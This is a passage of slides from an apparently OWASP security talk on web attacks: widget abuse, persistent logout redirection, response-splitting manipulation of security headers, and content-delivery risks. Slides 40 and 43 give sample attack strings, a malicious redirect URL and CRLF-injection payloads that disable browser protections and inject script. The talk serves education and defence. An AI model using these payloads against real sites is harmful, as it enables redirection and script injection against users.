  • 37. Web Widget Interface Flaws Attack scenario Details » Attacker registers his malicious blog with that content provider » Once it is registered, the widget is allowed to be included in the attacker controlled website » Attacker starts using the content provider link to redirect traffic to his blog and making victims vulnerable. OWASP 37
  • 38. Persistent Redirection Attacks HTTP Redirection  Automated redirection  What If attacker controls  More effective – if persistent OWASP 38
  • 39. Persistent Redirect Attacks Manipulating Logout Module Details » Enterprise application inbuilt functionality to provide a pre login parameter for inline redirection back to application OWASP home page while logging out of the application 2010 » Careful analysis and design scrutinization helps tester to find parameters which provide a persistent state to set your value A9 » The application does not verifies the value provided in the redirect variable while logging into the application » Another variation of login redirection attacks, this one is logout redirection attacks HackintheBox (HITB) EZine – Open Redirect Wreck Off Paper http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-002.pdf OWASP 39
  • 40. Persistent Redirection Attacks Manipulating Logout Module Layout – Vulnerability at disclosed to one of the biggest vendor – Successfully exploited and triggered in a large number of applications https://www.example.com/XXX_YYYY/ret.jsp? _pc=STANDARD_WEB_PAGE_STAT&_pi=1800&kk_home_url=http://www.malic ious.org – When a above stated URL is used to login into application, the value of kk_home_url variable becomes persisted. OWASP 40
  • 41. Declarative Security Manipulation Concept Operation - Idea – The declarative model provides an extensible set of security parameters in the HTTP responses – Browsers can respond with a requested security mechanism – Declared by the developer as part of the web server or application running on the server. In this way, declarative security can provide both a portable and flexible security defense Why declarative security in http response headers – ClickJacking attacks – XSS filtering issues – File downloading security – HTML content rendering OWASP 41
  • 42. Declarative Security Manipulation HTTP response headers  Clickjacking – X-FRAME-OPTIONS {SAMEORIGIN / DENY} » Don’t allow the website to be framed » Browser automatically escape the framing – X-XSS-PROTECTION { 0 – Disable| 1- Enable} » Triggers inbuilt IE XSS protection » Nothing much to say about its insecurity – X-CONTENT-TYPE-OPERATIONS{ NOSNIFF} » Preventing script execution through images » Secure MIME interpretation – X-DOWNLOAD-OPTIONS{ NOOPEN} » Disallowing opening of files on internet Applied as HTTP response headers– HTTP response splitting attacks work appropriately ( %0d%0a) OWASP 42
  • 43. Declarative Security - Study Generic attack styles http://www.vulnerable.com/tamper.pl?url=temp1%3dparam1;%0d%0aX-XSS-Protection:0 %0d%0a%0d%0a<html><body><script>alert(‘0wned')</script></body></html> http://www.vulnerable.com/tamper.pl?url=temp1%3dparam1;%0d%0aX-Download-Open: %0d%0a%0d%0a<html><body><script>alert(‘0wned')</script></body></html> http://www.vulnerable.com/tamper.pl?url=temp1%3dparam1;%0d%0aX-Frame-Options:0 [No value] %0d%0a%0d%0a<html><body><script>alert(‘0wned')</script></body></html> http://www.vulnerable.com/tamper.pl?url=temp1%3dparam1;%0d%0aX-Content-Type- Options:[no Value] %0d%0a%0d %0a<html><body><script>alert(‘0wned')</script></body></html> Provide any falisfied value to bedazzle the real working of security component in a browser. OWASP 43
  • 44. Declarative Security - Study Feasibility study  Implementation of DS in real world  To understand the scenario  To understand the adaptability  To estimate the risk to websites Paper released at Usenix CollSec (Collaborative Methods of Security and Privacy ) :http://www.usenix.org/events/collsec10/tech/full_papers/Sood.pdf OWASP 44
  • 45. Declarative Security - Study Feasibility study  Alex top 1000 website responses  Google’s GWS implements the most Paper released at Usenix CollSec (Collaborative Methods of Security and Privacy ) :http://www.usenix.org/events/collsec10/tech/full_papers/Sood.pdf OWASP 45
  • 46. Content Delivery Networks – Stringency Content from third party  Online advertisements  Video streaming content  Windows Media files (MP4, MP3) /Quick time  Embedded Flash files  Inline frames used for rendering contents  EMBED / OBJECT/ FRAME – HTML/DOM supporting elements OWASP 46
  • 47. Content Delivery Networks – Stringency Web 2.0 requirement OWASP 47
  • 48. Content Delivery Networks – Stringency  Example – A malicious media player file can infect victims with malware once included from third party content network  Easy to bypass filter Setting the Payload Payload bypasses XSS filter and starts downloading XLS file OWASP 48
  • 49. WWW Vulnerabilities - Circle Testing and Evolving complex Strengthening Technology Efficient Hacks Complex Flaws OWASP 49
  • 50. Conclusion Attacks on web infrastructure are increasing More complexity more problems Security is a process and not a one time shot Design according to requirement Test appropriately OWASP 50
  • 51. Questions and Knowledge Sharing OWASP 51
  • 52. Demonstrations - Available If Required Shared on Individual Front. OWASP 52
  • 53. Thanks OWASP (http://www.owasp.org ) SecNiche Security (http://www.secniche.org ) OWASP 53